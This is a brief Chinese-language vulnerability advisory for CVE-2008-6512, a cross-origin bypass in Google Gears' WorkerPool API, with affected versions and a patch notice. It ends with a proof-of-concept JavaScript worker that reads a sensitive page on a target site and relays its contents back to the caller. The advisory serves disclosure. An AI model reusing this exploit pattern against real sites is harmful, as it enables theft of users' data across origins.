BUGTRAQ ID: 32698
CVE(CAN) ID: CVE-2008-6512
Google Gears是一个开源浏览器扩展,允许开发者开发离线网络程序。
Google Gears的WorkerPool API中存在跨域安全漏洞。如果攻击者在目标域上放置了包含有Google Gear命令的文件类型,然后从攻击域访问该文件,由于没有检查攻击域的响应头,因此可能绕过allowCrossOrigin函数的访问限制在目标域中运行worker代码。
Google Gears < 0.5.4.2
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.google.com” target=“_blank”>http://www.google.com</a>
var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
var request = google.gears.factory.create(\'beta.httprequest\');
request.open(\'GET\', \'http://TARGET.SITE/SENSITIVE_PAGE.htm\');
request.onreadystatechange = function() {
if (request.readyState == 4) {
wp.sendMessage(\"The response was: \" +
request.responseText, message.sender);
}
};
request.send();
}